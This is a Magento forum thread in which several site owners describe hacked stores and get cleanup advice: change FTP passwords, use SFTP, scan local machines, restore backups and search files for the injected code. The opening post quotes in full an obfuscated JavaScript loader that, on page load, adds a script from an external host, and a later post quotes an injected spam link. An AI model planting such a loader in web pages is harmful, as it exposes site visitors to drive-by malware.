Posting in the Magento forums has been disabled pending the implementation of a new and improved forum solution which should better serve the community.

For new questions please post at magento.stackexchange.com, the community-run support site for the Magento community. We will be providing updates on the new forum solution soon. For questions or concerns please email community@magento.com.

Magento Forum

Page 1 of 2
My new Magento site Hacked
 
shayona
Jr. Member
 
Total Posts:  15
Joined:  2009-11-14
Ahmedabad, India
 

Hi,

i launch my new magento (latest verson) site before a month and today when i go to my site, i found error

Parse error: syntax error, unexpected ‘<’ in /home/website/public_html/index.php on line 67

when i download index file and check line 67 i found following script, i remove it and upload index file, site is working ok but i have few question

1. how they hack my website and upload this script in my website
2. how to prevent from such hacker
3. i afraid that the hacker might be upload this script on other file, how to scan my website completely, i have shared hosting

waiting for your reply

<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement(’script’);H3qqea3ur6p.setAttribute(’type’, ‘text/javascript’);H3qqea3ur6p.setAttribute(’id’, ‘myscript1’);H3qqea3ur6p.setAttribute(’src’, ‘h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v;()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i;#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t;@@a()r#$#)t))@s#!#)a!l##e@(.))&r;$!u!&):)8(0$)@$8^#^@0&)$^/!!&w;@$(o@^r(^(!d@^p^#)r#e@^s(&s;&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e;^))&@-($(m)#)a#)i^l^#.!&^)i!&t;$@^/((!(l)!i&v;^(&(e()#j^$a&s;@(&m;$^&(i$#@n!#^-#@)p$!!$h$!o(&#t;(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t;)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o;^^m^@/(@^^’.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ‘’));H3qqea3ur6p.setAttribute(’defer’, ‘defer’);document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>

 
Magento Community Magento Community
Magento Community
Magento Community
 
Crucial Web Host
Guru
 
Avatar
Total Posts:  364
Joined:  2007-11-08
Phoenix, AZ
 

Hi Nile,

nile - 04 December 2009 11:11 PM

how they hack my website and upload this script in my website

The most likely scenario is that this is not a Magento exploit at all.

There is a nasty FTP exploit going around that hijacks a users FTP passwords from popular FTP applications on ‘local’ computers, ie. your home system.  This hijacked FTP password is then sent to the ‘hacker’, or phoned home, where the hacker then injects various iframe and javascripts into a variety of pages on your site - in this case, and most cases, index.php - since it is most likely to exist and be accessed.

nile - 04 December 2009 11:11 PM

i afraid that the hacker might be upload this script on other file, how to scan my website completely, i have shared hosting

This can be confirmed by viewing your FTP logs on, or about, the time that your index.php files was injected with the script.  If you are using shared hosting, your host should easily be able to do this.  What you’ll find is that someone other than you has used your ftp credentials to inject the script into your page(s).  This will also help you to know which pages have been injected and help you to clean things up.

nile - 04 December 2009 11:11 PM

how to prevent from such hacker

The quick and immediate way to stop this is to change your FTP password with your host.  Without changing your FTP password, this will continue to happen over and over again, until you do change it.  Best to just change it now.

But, the real issue here is that one of the computers that accesses your FTP account (your computer or possibly others who have access) have had their FTP program compromised.  You will need to scan all computers that have had FTP access to your account for malware and exploits - one or more of the machines has been exploited and you’ll need to find the source or this will just happen again once you access your FTP account from this compromised computer.

In the end - the exploit was likely picked up from a rouge webpage that exploited a weakness in your browser and was able to compromise the FTP application and gain the saved login credentials.  Changing the FTP password will stop the script injections, but until you find the compromised computer this will continue to be a problem for you.

I recommend you check out SpyBot ( http://www.safer-networking.org/index2.html ) or Microsoft Security Essentials ( http://www.microsoft.com/Security_Essentials/ ) if you are using a Microsoft OS on your computer(s).

Hope this helps -
Happy Holidays~

 
Magento Community Magento Community
Magento Community
Magento Community
 
Crucial Web Host
Guru
 
Avatar
Total Posts:  364
Joined:  2007-11-08
Phoenix, AZ
 

I’d also like to add that you really should no longer be using FTP -

This is an incredibly insecure protocol that sends your login credentials via plain text across the network. 

You should be using SFTP or SCP for file transfers as these protocols are supported by all major FTP/IDE applications and submit your login credentials in an encrypted format providing a much stronger layer of security. 

FTP is most likely the weakest link in all web hosting.  FTP should be disabled completely if not in use.  A very insecure protocol, indeed.

 
Magento Community Magento Community
Magento Community
Magento Community
 
lisali
Enthusiast
 
Avatar
Total Posts:  889
Joined:  2008-04-28
London, UK
 

Hi,

One of my sites was hacked too.

The files modified are:

SITE.com/index.php
SITE.com/downloader/index.php

They may be other infected files, but not sure yet. My FTP client is WinSCP.

 
Magento Community Magento Community
Magento Community
Magento Community
 
lisali
Enthusiast
 
Avatar
Total Posts:  889
Joined:  2008-04-28
London, UK
 

Hi,

Actually, there are LOADS of compromised files. All php/phtml/js.
Good luck!

 
Magento Community Magento Community
Magento Community
Magento Community
 
Soro
Jr. Member
 
Total Posts:  16
Joined:  2009-07-22
 

I was hacked 10 hours ago also, removed the javascript from index file but the admin section is still not working.

Yeah just found it on these files as well
SITE.com/index.php
SITE.com/downloader/index.php

I am downloading my website and searching for the script, is the script the only thing you have found, over and over again or are there different things?

 
Magento Community Magento Community
Magento Community
Magento Community
 
Soro
Jr. Member
 
Total Posts:  16
Joined:  2009-07-22
 

Yeah I’m finding this file in lots of files, I am just looking at what files were edited last night and changing them. Let me know how anyone else goes with this smile

 
Magento Community Magento Community
Magento Community
Magento Community
 
lisali
Enthusiast
 
Avatar
Total Posts:  889
Joined:  2008-04-28
London, UK
 

This was an FTP exploit, so change your FTP username/password ASAP. Run a virus/rootkit scan. McAfee can repair infected files.

About a thousand files are infected. A number in downloader/pearlib/download. You can delete all the files in that directory anyway, so you have less to deal with.

The JS files have a slightly different exploit.

The best thing to do is to download all the files locally, run “find” on “/*GNU GPL*/” and see what comes up. Then run “find & replace”.

Good luck!

 
Magento Community Magento Community
Magento Community
Magento Community
 
Soro
Jr. Member
 
Total Posts:  16
Joined:  2009-07-22
 

Thanks lisali,

I just manually changed probably 60 files, but the admin still doesn’t work properly, I am downloading my site and doing as you advised now.

Thanks!

 
Magento Community Magento Community
Magento Community
Magento Community
 
JLHC
Mentor
 
Avatar
Total Posts:  1287
Joined:  2008-05-09
Tampa, FL
 

Well if you have a recent backup it is recommended to restore your files and database from the backup if possible.

Besides changing your passwords, you should also not store any password information in your browser as well as your FTP clients and make sure that they are updated to the latest versions, as passwords are normally stolen from web browsers as well as FTP clients.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Soro
Jr. Member
 
Total Posts:  16
Joined:  2009-07-22
 

Yeah I didn’t make a recent back up this time, It all seems to be working good now though, just removed it from another 100 pages, im with aspiration, ill keep in mind to make a backup once every couple of days.

 
Magento Community Magento Community
Magento Community
Magento Community
 
JLHC
Mentor
 
Avatar
Total Posts:  1287
Joined:  2008-05-09
Tampa, FL
 
Soro - 07 January 2010 03:56 PM

Yeah I didn’t make a recent back up this time, It all seems to be working good now though, just removed it from another 100 pages, im with aspiration, ill keep in mind to make a backup once every couple of days.

Great to hear that it is working fine for you now. wink
In the future if you are hosted by us, we can restore your website from a recent backup as well if you request for it.

 
Magento Community Magento Community
Magento Community
Magento Community
 
RRadvice
Jr. Member
 
Total Posts:  3
Joined:  2009-12-12
 

You are not alone, I got hit by the same thing. A real pain to remove. I saw a reference toa script to find those files and strip the code at the bottom of the page but did not bookmark it and can not locate it now.  If anyone knows of its location it would be really appreciated.

 
Magento Community Magento Community
Magento Community
Magento Community
 
lazzo
Jr. Member
 
Avatar
Total Posts:  10
Joined:  2009-09-07
Malmö, Sweden
 

Check this site to find a cure. Start by changing your FTP password to avoid future porblems, then run script you find here in your www-root.
http://seoforums.org/site-optimization/118-script-gnu-gpl-try-window-onload-function-var.html

Affected files are index*.php, default*, .js etc.

My guess is that you have been using FileZilla and some evil malware have found the XML file that stores hosts, users and passwords in clear text. So if you have other sites added to filezilla, make sure to change password and run the scripts here as well.

Good luck.

 
Magento Community Magento Community
Magento Community
Magento Community
 
Turnkeye
Enthusiast
 
Avatar
Total Posts:  908
Joined:  2008-12-20
URL: turnkeye.com
 

Also scan your files for base 64 encoded code, hackers can use this tactics to hide the code that was added to the files.

 
Magento Community Magento Community
Magento Community
Magento Community
 
RegB
Jr. Member
 
Total Posts:  9
Joined:  2010-02-28
 

This morning I discovered our site was hacked around 5:00 pm yesterday afternoon.  The website homepage was reporting the following error as was the Magento Admin console:

error message:  Parse error: syntax error, unexpected \’<\’ in /home/MYDOMAIN/public_html/index.php on line 79

I first checked the date/time stamp on index.php and saw that it exactly matched the date/time on my backup.  So, first impression was no changes had been made to the file.  However, the following line had been appended to the very last line of the file:

a rel="muse" href="http://ediziizle.com" title="dizi izle, online dizi izle, diziizle” ><font color="#FF0000" size="2"><b>dizi izle</b></font></a>

My ISP checked the FTP log files for our account and found NO RECENT ACTIVITY.  So, this does not appear to be a case of FTP username/password being stolen and used to change files on our site.

The downloader/index.php file was not modified.  So far, it looks like none of the other files on our site were modified.  However, I’m still downloading the site and verifying.

Right now I’m completely clueless as to how the root index.php file was modified (without the date/time stamp being updated, too).  We are running Magento version 1.4.0.1.

Any help, thoughts, ideas, etc., on what needs to be fixed to prevent this from happening would be greatly appreciated.

 
Magento Community Magento Community
Magento Community
Magento Community
Magento Community
Magento Community
Back to top
Page 1 of 2